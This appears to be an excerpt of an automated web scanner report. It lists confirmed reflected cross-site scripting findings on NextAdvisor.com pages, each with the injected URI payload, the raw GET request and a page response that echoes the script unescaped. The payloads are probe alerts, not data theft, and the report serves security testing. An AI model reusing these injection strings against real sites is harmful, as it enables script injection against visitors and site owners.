value="/payday_loans/index.php">Payday Loans</option> <option value="/people_search/index.php">People Search</option> <option value="/remote_desktop/index.php">Remote Desktop</option> <option value="/savings_accounts/index.php">Savings Accounts</option> <option value="/internet_security_software/index.php">Security Software</option> <option value="/online_tax_preparation_services/index.php">Tax Preparation</option> <option value="/virtual_phone/index.php">Virtual Phone</option> <option 
value="/voip_services/index.php">VoIP Services</option> <option value="/web_hosting/index.php">Web Hosting</option> </select> </form> </div> <ul> <li><a href="/index.php" class="nav_home">Home</a></li> <li><a href="/voip_services/index.php" > VoIP<br/>Services </a></li> <li><a href="/credit_report_monitoring/index.php" > Credit<br/>Monitoring </a></li> <li><a href="/identity_theft_protection_services/index.php" > Identity<br/>Theft </a></li> <li><a href="/web_hosting/index.php" > Web<br/>Hosting </a></li> <li><a href="/diet_services/index.php" > Diet<br/>Programs </a></li> <li><a href="/online_college/index.php" > Online<br/>College </a></li> <li><a href="/internet_security_software/index.php" > Security<br/>Software </a></li> <li><a href="/online_backup_services/index.php" > Online<br/>Backup </a></li> <li><a href='/script><script>netsparker(0x0001DE)</index.php' class='nav_select'></a></li> </ul> <br style="clear:both" /> </div> </div> </div></div> <div id="content_container"> <!--End Navigation--> <!--End Header--> <!--Start Sub Navigation--><div class="sub_nav"><p> <a href="script%3E.php" class='link_off'>Overview</a> <span class="nav_border">|</span> <a href="compare_diy.php">DIY Diets</a> <span class="nav_border">|</span> <a href="compare_meals.php">Meal Plan Diets</a> <span class="nav_border">|</span> <a href="/diet_services/taste_test.php">Taste Test</a> <span class="nav_border">|</span> <a href="faqs.php">FAQ</a><span class="nav_border">|</span> <a href="../blog/">Blog</a><div> <form action="http://www.nextadvisor.com/search_results.php" id="cse-search-box"> <label for="q"> Search NextAdvisor.com<br/><input type="text" name="q" size="18" /> <input type="submit" name="sa" value="Search" style="width:auto;" /> <input type="hidden" name="cx" value="010808658558223622043:td9kdqti1km" /> <input type="hidden" name="cof" value="FORID:11;NB:1" /> <input type="hidden" name="ie" value="UTF-8" /></form></p></div><script type="text/javascript" 
src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en"></script> </p></div> <!--End Sub Navigation--><script>function checkForm() { hideAllErrors(); var formIsValid = showErrorAndFocusIf('FieldData0', isEmpty, 'nameError') && showErrorAndFocusIf('FieldData2', isEmpty, 'emailError') && showErrorAndFocusIf('FieldData2', isAnInvalidEmail, 'emailError2') && showErrorAndFocusIf('FieldData1', isEmpty, 'questionError'); return formIsValid;}function showErrorAndFocusIf(fieldId, predicate, errorId) { var field = document.getElementById(fieldId); if (predicate(field)) { document.getElementById(errorId).style.display = 'inline'; if (field.select) { field.select(); } field.focus(); return false; } return true;}function isEmpty(field) { return field.value == '';}function isAnInvalidEmail(field) { var email = field.value; var ok = "1234567890qwertyuiop[]asdfghjklzxcvbnm.@-_QWERTYUIOPASDFGHJKLZXCVBNM"; for(i = 0; i < email.length; i++){ if(ok.indexOf(email.charAt(i)) < 0) { return true; } } re = /(@.*@)|(\.\.)|(^\.)|(^@)|(@$)|(\.$)|(@\.)/; re_two = /^.+\@(\[?)[a-zA-Z0-9\-\.]+\.([a-zA-Z]{2,4}|[0-9]{1,3})(\]?)$/; return re.test(email) || !re_two.test(email);}function hideAllErrors() { document.getElementById("nameError").style.display = "none" document.getElementById("emailError").style.display = "none" document.getElementById("emailError2").style.display = "none" document.getElementById("questionError").style.display = "none"}</script><!--Start Content--><div id="content" class="img_left"><!--Start Left Content--> <div id="left_content"> <div class="img_left"><img src="/images/category_icons/diets_icon.gif" alt="" /> </div> <h1 style="padding:5px 0px 5px 15px;"> Online Diet Programs FAQ</h1> <p>Frequently Asked Questions about Online Diet Programs</p> <ul class=""> </ul> <br> <div style="padding:5px; padding-top:1px; background:#eeffff; margin-right:10px;"> <span class="latest"><p><strong>Search our site for more information about Online Diet 
Programs:</strong></p></span> <form action="http://www.nextadvisor.com/answers.php" id="cse-search-box"> <div> <input type="hidden" name="cx" value="010808658558223622043:td9kdqti1km" /> <input type="hidden" name="cof" value="FORID:10" /> <input type="hidden" name="ie" value="UTF-8" /> <input type="text" name="q" size="31" /> <input type="submit" name="sa" value="Search" /> </div> </form> </div> <div> <p>If you can't find the question you're looking for, you can ask it here. Due to volume, we aren't able to respond to every question, but we answer as many as we can on the NextAdvisor.com blog. <form onSubmit="return checkForm();" method="post" action="http://www.emailmeform.com/fid.php?formid=303001" name="form1"> <div> <p><label for="FieldData0"><strong>Name:</strong></label> <input type="text" name="FieldData0" id="FieldData0" value="" size="22" tabindex="1" /></p> </div> <div class="error" id="nameError"> Required: Please enter your name </div> <div> <p><label for="FieldData2"><strong>Email</strong> (will not be published)<strong>:</strong> </label><input type="text" name="FieldData2" id="FieldData2" value="" size="22" tabindex="2" /></p> </div> <div class="error" id="emailError"> Required: Please enter your email address </div> <div class="error" id="emailError2"> This doesn't look like a real email address, please check and reenter </div> <div> <p><label for="FieldData3"></label> <input type="hidden" name="FieldData3" value="diet_services"> <input type="hidden" name="FieldData4" 
..

/online_dvd_rental_services/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001FA)%3C/script%3E.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0001FA)%3C/script%3E CONFIRMED

http://www.nextadvisor.com/online_dvd_rental_services/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3E..

Parameters

Parameter | Type | Value
URI-BASED | Raw URI | '"--></style></script><script>alert(0x0001FA)</script>

Request

GET /online_dvd_rental_services/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001FA)%3C/script%3E.php HTTP/1.1
Referer: http://www.nextadvisor.com/online_dvd_rental_services/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.nextadvisor.com
Cookie: PHPSESSID=17a69ca9583e0628dce18d23efe8c700
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:57:18 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 5910
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /><link rel="shortcut icon" href="http://www.nextadvisor.com/images/favicon.ico" /><title> - NextAdvisor.com</title><meta name="description" content=""/><meta name="keywords" content=", online dvd rental, movie downloads, movie download, online streaming, watch movies instantly, movie download service, online game rental, Netflix, Blockbuster, CinemaNow" /><link href="/style-wide.css" type="text/css" rel="stylesheet" /><link rel="canonical" href="http://www.nextadvisor.com/online_dvd_rental_services/'"--></style></script><script>netsparker(0x0001FA)</script>.php" /><META name="y_key" content="c9a79123df10579a" /><meta name="msvalidate.01" content="7764DB09B9B7538FA422136D9D3745C1" /><meta name="msvalidate.01" content="60BB3E34FE2D428583F7C150AF730E34" /><meta name="msvalidate.01" content="B41084B242E240B28A144148F5AE6EB2" /><meta name="netinsert" content="0.0.1.12.14.1" /><script type="text/javascript" src="/includes/javascript.php?script=jquery.js"></script><script type="text/javascript" src="/includes/javascript.php?script=animatedcollapse.js"></script><script type="text/javascript">//googlefunction recordOutboundLink(link, category, action) { try { var pageTracker=_gat._getTracker("UA-246595-2"); pageTracker._trackEvent(category, action); setTimeout('document.location = "' + link.href + '"', 100) }catch(err){}}</script></head><body><!--Start Container--><div id="container"> <!--Start Header--> <div id="top_content"> <div id="header"> <div id="logo_name"> <a href="/index.php"><img src="/images/nextadvisor1.gif" alt="NextAdvisor.com Logo" width="238" height="42" /></a> </div> <!-- /logo_name --> <p class="toptext">The trusted, independent source for comparing the most valuable new services.</p> </div> <!-- /header --> 
<!--Start Content Container--> <!--Start Navigation--> <div id="navigation"> <div class="nav_left_bg"> <div class="nav_right_bg"> <div class="otherserv"> <script type="text/javascript"> function surfto(form) { var myindex=form.select1.selectedIndex if (form.select1.options[myindex].value != 0) { location=form.select1.options[myindex].value;} } </script> <form name="form1"> <select name="select1" onChange="surfto(this.form)" size=1> <option value="0" selected>-- All Services -- </option> <option value="/audiobooks/index.php">Audiobooks</option> <option value="/auto_insurance/index.php">Auto Insurance</option> <option value="/credit_cards/index.php">Credit Cards</option> <option value="/credit_report_monitoring/">Credit Monitoring</option> <option value="/diet_services/index.php">Diet Programs</option> <option value="/online_dvd_rental_services/index.php">DVD Rental</option> <option value="/genealogy/index.php">Genealogy</option> <option value="/identity_theft_protection_services/index.php">Identity Theft</option> <option value="/internet_fax/index.php">Internet Fax</option> <option value="/online_backup_services/index.php">Online Backup</option> <option value="/online_college/index.php">Online College</option> <option value="/online_dating/index.php">Online Dating</option> <option value="/online_meeting/index.php">Online Meeting</option> <option value="/parental_controls/index.php">Parental Controls</option> <option value="/payday_loans/index.php">Payday Loans</option> <option value="/people_search/index.php">People Search</option> <option value="/remote_desktop/index.php">Remote Desktop</option> <option value="/savings_accounts/index.php">Savings Accounts</option> <option value="/internet_security_software/index.php">Security Software</option> <option value="/online_tax_preparation_services/index.php">Tax Preparation</option> <option value="/virtual_phone/index.php">Virtual Phone</option> <option value="/voip_services/index.php">VoIP Services</option> <option 
value="/web_hosting/index.php">Web Hosting</option> </select> </form> </div> <ul> <li><a href="/index.php" class="nav_home">Home</a></li> <li><a href="/voip_services/index.php" > VoIP<br/>Services </a></li> <li><a href="/credit_report_monitoring/index.php" > Credit<br/>Monitoring </a></li> <li><a href="/identity_theft_protection_services/index.php" > Identity<br/>Theft </a></li> <li><a href="/web_hosting/index.php" > Web<br/>Hosting </a></li> <li><a href="/diet_services/index.php" > Diet<br/>Programs </a></li> <li><a href="/online_college/index.php" > Online<br/>College </a></li> <li><a href="/internet_security_software/index.php" > Security<br/>Software </a></li> <li><a href="/online_backup_services/index.php" > Online<br/>Backup </a></li> <li><a href='/script><script>netsparker(0x0001FA)</index.php' class='nav_select'></a></li> </ul> <br style="clear:both" /> </div> </div> </div></div> <div id="content_container"> <!--End Navigation--> <!--End Header--> <!--Start Sub Navigation--><div class="sub_nav"><p> <a href="index.php">Overview</a> <span class="nav_border">|</span> <a href="compare.php">Compare All Services</a> <span class="nav_border">|</span> <a href="faqs.php">FAQ</a><span class="nav_border">|</span> <a href="../blog/">Blog</a><div> <form action="http://www.nextadvisor.com/search_results.php" id="cse-search-box"> <label for="q"> Search NextAdvisor.com<br/><input type="text" name="q" size="18" /> <input type="submit" name="sa" value="Search" style="width:auto;" /> <input type="hidden" name="cx" value="010808658558223622043:td9kdqti1km" /> <input type="hidden" name="cof" value="FORID:11;NB:1" /> <input type="hidden" name="ie" value="UTF-8" /></form></p></div><script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en"></script> </p></div> <!--End Sub Navigation--><script>function checkForm() { hideAllErrors(); var formIsValid = showErrorAndFocusIf('FieldData0', isEmpty, 'nameError') && 
showErrorAndFocusIf('FieldData2', isEmpty, 'emailError') && showErrorAndFocusIf('FieldData2', isAnInvalidEmail, 'emailError2') && showErrorAndFocusIf('FieldData1', isEmpty, 'questionError'); return formIsValid;}function showErrorAndFocusIf(fieldId, predicate, errorId) { var field = document.getElementById(fieldId); if (predicate(field)) { document.getElementById(errorId).style.display = 'inline'; if (field.select) { field.select(); } field.focus(); return false; } return true;}function isEmpty(field) { return field.value == '';}function isAnInvalidEmail(field) { var email = field.value; var ok = "1234567890qwertyuiop[]asdfghjklzxcvbnm.@-_QWERTYUIOPASDFGHJKLZXCVBNM"; for(i = 0; i < email.length; i++){ if(ok.indexOf(email.charAt(i)) < 0) { return true; } } re = /(@.*@)|(\.\.)|(^\.)|(^@)|(@$)|(\.$)|(@\.)/; re_two = /^.+\@(\[?)[a-zA-Z0-9\-\.]+\.([a-zA-Z]{2,4}|[0-9]{1,3})(\]?)$/; return re.test(email) || !re_two.test(email);}function hideAllErrors() { document.getElementById("nameError").style.display = "none" document.getElementById("emailError").style.display = "none" document.getElementById("emailError2").style.display = "none" document.getElementById("questionError").style.display = "none"}</script><!--Start Content--><div id="content" class="img_left"><!--Start Left Content--> <div id="left_content"> <div class="img_left"><img src="/images/category_icons/online_dvd_rental_services_icon.gif" alt="" /> </div> <h1 style="padding:5px 0px 5px 15px;"> Online DVD Rental FAQ</h1> <p>Frequently Asked Questions about Online DVD Rental</p> <ul class=""> </ul> <br> <div style="padding:5px; padding-top:1px; background:#eeffff; margin-right:10px;"> <span class="latest"><p><strong>Search our site for more information about Online DVD Rental:</strong></p></span> <form action="http://www.nextadvisor.com/answers.php" id="cse-search-box"> <div> <input type="hidden" name="cx" value="010808658558223622043:td9kdqti1km" /> <input type="hidden" name="cof" value="FORID:10" /> <input 
type="hidden" name="ie" value="UTF-8" /> <input type="text" name="q" size="31" /> <input type="submit" name="sa" value="Search" /> </div> </form> </div> <div> <p>If you can't find the question you're looking for, you can ask it here. Due to volume, we aren't able to respond to every question, but we answer as many as we can on the NextAdvisor.com blog. <form onSubmit="return checkForm();" method="post" action="http://www.emailmeform.com/fid.php?formid=303001" name="form1"> <div> <p><label for="FieldData0"><strong>Name:</strong></label> <input type="text" name="FieldData0" id="FieldData0" value="" size="22" tabindex="1" /></p> </div> <div class="error" id="nameError"> Required: Please enter your name </div> <div> <p><label for="FieldData2"><strong>Email</strong> (will not be published)<strong>:</strong> </label><input type="text" name="FieldData2" id="FieldData2" value="" size="22" tabindex="2" /></p> </div> <div class="error" id="emailError"> Required: Please enter your email address </div> <div class="error" id="emailError2"> This doesn't look like a real email address, please check and reenter </div> <div> <p><label for="FieldData3"></label> <input type="hidden" name="FieldData3" value="online_dvd_rental_services"> <input type="hidden" name="FieldData4" 
..

/online_dvd_rental_services/index.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000200)%3C/script%3E.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000200)%3C/script%3E CONFIRMED

http://www.nextadvisor.com/online_dvd_rental_services/index.php'%22--%3E%3C/style%3E%3C/script%3E%3C..

Parameters

Parameter | Type | Value
URI-BASED | Raw URI | '"--></style></script><script>alert(0x000200)</script>

Request

GET /online_dvd_rental_services/index.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000200)%3C/script%3E.php HTTP/1.1
Referer: http://www.nextadvisor.com/online_dvd_rental_services/index.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.nextadvisor.com
Cookie: PHPSESSID=17a69ca9583e0628dce18d23efe8c700
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:57:19 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 5925
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /><link rel="shortcut icon" href="http://www.nextadvisor.com/images/favicon.ico" /><title> - NextAdvisor.com</title><meta name="description" content=""/><meta name="keywords" content=", online dvd rental, movie downloads, movie download, online streaming, watch movies instantly, movie download service, online game rental, Netflix, Blockbuster, CinemaNow" /><link href="/style-wide.css" type="text/css" rel="stylesheet" /><link rel="canonical" href="http://www.nextadvisor.com/online_dvd_rental_services/index.php'"--></style></script><script>netsparker(0x000200)</script>.php" /><META name="y_key" content="c9a79123df10579a" /><meta name="msvalidate.01" content="7764DB09B9B7538FA422136D9D3745C1" /><meta name="msvalidate.01" content="60BB3E34FE2D428583F7C150AF730E34" /><meta name="msvalidate.01" content="B41084B242E240B28A144148F5AE6EB2" /><meta name="netinsert" content="0.0.1.12.14.1" /><script type="text/javascript" src="/includes/javascript.php?script=jquery.js"></script><script type="text/javascript" src="/includes/javascript.php?script=animatedcollapse.js"></script><script type="text/javascript">//googlefunction recordOutboundLink(link, category, action) { try { var pageTracker=_gat._getTracker("UA-246595-2"); pageTracker._trackEvent(category, action); setTimeout('document.location = "' + link.href + '"', 100) }catch(err){}}</script></head><body><!--Start Container--><div id="container"> <!--Start Header--> <div id="top_content"> <div id="header"> <div id="logo_name"> <a href="/index.php"><img src="/images/nextadvisor1.gif" alt="NextAdvisor.com Logo" width="238" height="42" /></a> </div> <!-- /logo_name --> <p class="toptext">The trusted, independent source for comparing the most valuable new services.</p> </div> <!-- /header --> 
<!--Start Content Container--> <!--Start Navigation--> <div id="navigation"> <div class="nav_left_bg"> <div class="nav_right_bg"> <div class="otherserv"> <script type="text/javascript"> function surfto(form) { var myindex=form.select1.selectedIndex if (form.select1.options[myindex].value != 0) { location=form.select1.options[myindex].value;} } </script> <form name="form1"> <select name="select1" onChange="surfto(this.form)" size=1> <option value="0" selected>-- All Services -- </option> <option value="/audiobooks/index.php">Audiobooks</option> <option value="/auto_insurance/index.php">Auto Insurance</option> <option value="/credit_cards/index.php">Credit Cards</option> <option value="/credit_report_monitoring/">Credit Monitoring</option> <option value="/diet_services/index.php">Diet Programs</option> <option value="/online_dvd_rental_services/index.php">DVD Rental</option> <option value="/genealogy/index.php">Genealogy</option> <option value="/identity_theft_protection_services/index.php">Identity Theft</option> <option value="/internet_fax/index.php">Internet Fax</option> <option value="/online_backup_services/index.php">Online Backup</option> <option value="/online_college/index.php">Online College</option> <option value="/online_dating/index.php">Online Dating</option> <option value="/online_meeting/index.php">Online Meeting</option> <option value="/parental_controls/index.php">Parental Controls</option> <option value="/payday_loans/index.php">Payday Loans</option> <option value="/people_search/index.php">People Search</option> <option value="/remote_desktop/index.php">Remote Desktop</option> <option value="/savings_accounts/index.php">Savings Accounts</option> <option value="/internet_security_software/index.php">Security Software</option> <option value="/online_tax_preparation_services/index.php">Tax Preparation</option> <option value="/virtual_phone/index.php">Virtual Phone</option> <option value="/voip_services/index.php">VoIP Services</option> <option 
value="/web_hosting/index.php">Web Hosting</option> </select> </form> </div> <ul> <li><a href="/index.php" class="nav_home">Home</a></li> <li><a href="/voip_services/index.php" > VoIP<br/>Services </a></li> <li><a href="/credit_report_monitoring/index.php" > Credit<br/>Monitoring </a></li> <li><a href="/identity_theft_protection_services/index.php" > Identity<br/>Theft </a></li> <li><a href="/web_hosting/index.php" > Web<br/>Hosting </a></li> <li><a href="/diet_services/index.php" > Diet<br/>Programs </a></li> <li><a href="/online_college/index.php" > Online<br/>College </a></li> <li><a href="/internet_security_software/index.php" > Security<br/>Software </a></li> <li><a href="/online_backup_services/index.php" > Online<br/>Backup </a></li> <li><a href='/script><script>netsparker(0x000200)</index.php' class='nav_select'></a></li> </ul> <br style="clear:both" /> </div> </div> </div></div> <div id="content_container"> <!--End Navigation--> <!--End Header--> <!--Start Sub Navigation--><div class="sub_nav"><p> <a href="script%3E.php" class='link_off'>Overview</a> <span class="nav_border">|</span> <a href="compare.php">Compare All Services</a> <span class="nav_border">|</span> <a href="faqs.php">FAQ</a><span class="nav_border">|</span> <a href="../blog/">Blog</a><div> <form action="http://www.nextadvisor.com/search_results.php" id="cse-search-box"> <label for="q"> Search NextAdvisor.com<br/><input type="text" name="q" size="18" /> <input type="submit" name="sa" value="Search" style="width:auto;" /> <input type="hidden" name="cx" value="010808658558223622043:td9kdqti1km" /> <input type="hidden" name="cof" value="FORID:11;NB:1" /> <input type="hidden" name="ie" value="UTF-8" /></form></p></div><script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en"></script> </p></div> <!--End Sub Navigation--><script>function checkForm() { hideAllErrors(); var formIsValid = showErrorAndFocusIf('FieldData0', isEmpty, 'nameError') && 
showErrorAndFocusIf('FieldData2', isEmpty, 'emailError') && showErrorAndFocusIf('FieldData2', isAnInvalidEmail, 'emailError2') && showErrorAndFocusIf('FieldData1', isEmpty, 'questionError'); return formIsValid;}function showErrorAndFocusIf(fieldId, predicate, errorId) { var field = document.getElementById(fieldId); if (predicate(field)) { document.getElementById(errorId).style.display = 'inline'; if (field.select) { field.select(); } field.focus(); return false; } return true;}function isEmpty(field) { return field.value == '';}function isAnInvalidEmail(field) { var email = field.value; var ok = "1234567890qwertyuiop[]asdfghjklzxcvbnm.@-_QWERTYUIOPASDFGHJKLZXCVBNM"; for(i = 0; i < email.length; i++){ if(ok.indexOf(email.charAt(i)) < 0) { return true; } } re = /(@.*@)|(\.\.)|(^\.)|(^@)|(@$)|(\.$)|(@\.)/; re_two = /^.+\@(\[?)[a-zA-Z0-9\-\.]+\.([a-zA-Z]{2,4}|[0-9]{1,3})(\]?)$/; return re.test(email) || !re_two.test(email);}function hideAllErrors() { document.getElementById("nameError").style.display = "none" document.getElementById("emailError").style.display = "none" document.getElementById("emailError2").style.display = "none" document.getElementById("questionError").style.display = "none"}</script><!--Start Content--><div id="content" class="img_left"><!--Start Left Content--> <div id="left_content"> <div class="img_left"><img src="/images/category_icons/online_dvd_rental_services_icon.gif" alt="" /> </div> <h1 style="padding:5px 0px 5px 15px;"> Online DVD Rental FAQ</h1> <p>Frequently Asked Questions about Online DVD Rental</p> <ul class=""> </ul> <br> <div style="padding:5px; padding-top:1px; background:#eeffff; margin-right:10px;"> <span class="latest"><p><strong>Search our site for more information about Online DVD Rental:</strong></p></span> <form action="http://www.nextadvisor.com/answers.php" id="cse-search-box"> <div> <input type="hidden" name="cx" value="010808658558223622043:td9kdqti1km" /> <input type="hidden" name="cof" value="FORID:10" /> <input 
type="hidden" name="ie" value="UTF-8" /> <input type="text" name="q" size="31" /> <input type="submit" name="sa" value="Search" /> </div> </form> </div> <div> <p>If you can't find the question you're looking for, you can ask it here. Due to volume, we aren't able to respond to every question, but we answer as many as we can on the NextAdvisor.com blog. <form onSubmit="return checkForm();" method="post" action="http://www.emailmeform.com/fid.php?formid=303001" name="form1"> <div> <p><label for="FieldData0"><strong>Name:</strong></label> <input type="text" name="FieldData0" id="FieldData0" value="" size="22" tabindex="1" /></p> </div> <div class="error" id="nameError"> Required: Please enter your name </div> <div> <p><label for="FieldData2"><strong>Email</strong> (will not be published)<strong>:</strong> </label><input type="text" name="FieldData2" id="FieldData2" value="" size="22" tabindex="2" /></p> </div> <div class="error" id="emailError"> Required: Please enter your email address </div> <div class="error" id="emailError2"> This doesn't look like a real email address, please check and reenter </div> <div> <p><label for="FieldData3"></label> <input type="hidden" name="FieldData3" value="online_dvd_rental_services"> <input type="hidden" name="FieldData4" 
value=".."> </div></p> <div> <p><label for="FieldData1"><strong>Your Question:</p></strong></label> <textarea name="FieldData1" id="FieldData1" cols="50" rows="5" tabindex="3"></textarea> <div class="error" id="questionError"> <p>Please type your question in the box</p> </div> </div> <input type="submit" class="btn" value="Submit Question" name="Submit"> </form> </div><p></div> <!--End Left Content--> <!--Start Right Content--> <div id="right_content_faq"> <!--Start Right Yellow Box--> <div id="box" style="margin-top:15px;"> <div id="box_top"> <div id="box_content"> <div class="box_text"> <div class="box_image"><a href="/link.php?kw=..

/genealogy/index.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00021D)%3C/script%3E.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00021D)%3C/script%3E CONFIRMED

http://www.nextadvisor.com/genealogy/index.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetspark..

Parameters

Parameter    Type       Value
URI-BASED    Raw URI    '"--></style></script><script>alert(0x00021D)</script>

Request

GET /genealogy/index.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00021D)%3C/script%3E.php HTTP/1.1
Referer: http://www.nextadvisor.com/genealogy/index.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.nextadvisor.com
Cookie: PHPSESSID=17a69ca9583e0628dce18d23efe8c700
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:57:27 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 6431
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /><link rel="shortcut icon" href="http://www.nextadvisor.com/images/favicon.ico" /><title> - NextAdvisor.com</title><meta name="description" content=""/><meta name="keywords" content=", genealogy, genealogy research, family tree, family line, ancestors, , Ancestry.com, Archives.com, Footnote.com, Onegreatfamily.com, FamilyBuilder.com" /><link href="/style-wide.css" type="text/css" rel="stylesheet" /><link rel="canonical" href="http://www.nextadvisor.com/genealogy/index.php'"--></style></script><script>netsparker(0x00021D)</script>.php" /><META name="y_key" content="c9a79123df10579a" /><meta name="msvalidate.01" content="7764DB09B9B7538FA422136D9D3745C1" /><meta name="msvalidate.01" content="60BB3E34FE2D428583F7C150AF730E34" /><meta name="msvalidate.01" content="B41084B242E240B28A144148F5AE6EB2" /><meta name="netinsert" content="0.0.1.12.14.1" /><script type="text/javascript" src="/includes/javascript.php?script=jquery.js"></script><script type="text/javascript" src="/includes/javascript.php?script=animatedcollapse.js"></script><script type="text/javascript">//googlefunction recordOutboundLink(link, category, action) { try { var pageTracker=_gat._getTracker("UA-246595-2"); pageTracker._trackEvent(category, action); setTimeout('document.location = "' + link.href + '"', 100) }catch(err){}}</script></head><body><!--Start Container--><div id="container"> <!--Start Header--> <div id="top_content"> <div id="header"> <div id="logo_name"> <a href="/index.php"><img src="/images/nextadvisor1.gif" alt="NextAdvisor.com Logo" width="238" height="42" /></a> </div> <!-- /logo_name --> <p class="toptext">The trusted, independent source for comparing the most valuable new services.</p> </div> <!-- /header --> <!--Start Content Container--> 
<!--Start Navigation--> <div id="navigation"> <div class="nav_left_bg"> <div class="nav_right_bg"> <div class="otherserv"> <script type="text/javascript"> function surfto(form) { var myindex=form.select1.selectedIndex if (form.select1.options[myindex].value != 0) { location=form.select1.options[myindex].value;} } </script> <form name="form1"> <select name="select1" onChange="surfto(this.form)" size=1> <option value="0" selected>-- All Services -- </option> <option value="/audiobooks/index.php">Audiobooks</option> <option value="/auto_insurance/index.php">Auto Insurance</option> <option value="/credit_cards/index.php">Credit Cards</option> <option value="/credit_report_monitoring/">Credit Monitoring</option> <option value="/diet_services/index.php">Diet Programs</option> <option value="/online_dvd_rental_services/index.php">DVD Rental</option> <option value="/genealogy/index.php">Genealogy</option> <option value="/identity_theft_protection_services/index.php">Identity Theft</option> <option value="/internet_fax/index.php">Internet Fax</option> <option value="/online_backup_services/index.php">Online Backup</option> <option value="/online_college/index.php">Online College</option> <option value="/online_dating/index.php">Online Dating</option> <option value="/online_meeting/index.php">Online Meeting</option> <option value="/parental_controls/index.php">Parental Controls</option> <option value="/payday_loans/index.php">Payday Loans</option> <option value="/people_search/index.php">People Search</option> <option value="/remote_desktop/index.php">Remote Desktop</option> <option value="/savings_accounts/index.php">Savings Accounts</option> <option value="/internet_security_software/index.php">Security Software</option> <option value="/online_tax_preparation_services/index.php">Tax Preparation</option> <option value="/virtual_phone/index.php">Virtual Phone</option> <option value="/voip_services/index.php">VoIP Services</option> <option value="/web_hosting/index.php">Web 
Hosting</option> </select> </form> </div> <ul> <li><a href="/index.php" class="nav_home">Home</a></li> <li><a href="/voip_services/index.php" > VoIP<br/>Services </a></li> <li><a href="/credit_report_monitoring/index.php" > Credit<br/>Monitoring </a></li> <li><a href="/identity_theft_protection_services/index.php" > Identity<br/>Theft </a></li> <li><a href="/web_hosting/index.php" > Web<br/>Hosting </a></li> <li><a href="/diet_services/index.php" > Diet<br/>Programs </a></li> <li><a href="/online_college/index.php" > Online<br/>College </a></li> <li><a href="/internet_security_software/index.php" > Security<br/>Software </a></li> <li><a href="/online_backup_services/index.php" > Online<br/>Backup </a></li> <li><a href='/script><script>netsparker(0x00021D)</index.php' class='nav_select'></a></li> </ul> <br style="clear:both" /> </div> </div> </div></div> <div id="content_container"> <!--End Navigation--> <!--End Header--> <!--Start Sub Navigation--><div class="sub_nav"><p> <a href="script%3E.php" class='link_off'>Overview</a> <span class="nav_border">|</span> <a href="compare.php">Compare All Services</a> <span class="nav_border">|</span> <a href="faqs.php">FAQ</a><span class="nav_border">|</span> <a href="../blog/">Blog</a><div> <form action="http://www.nextadvisor.com/search_results.php" 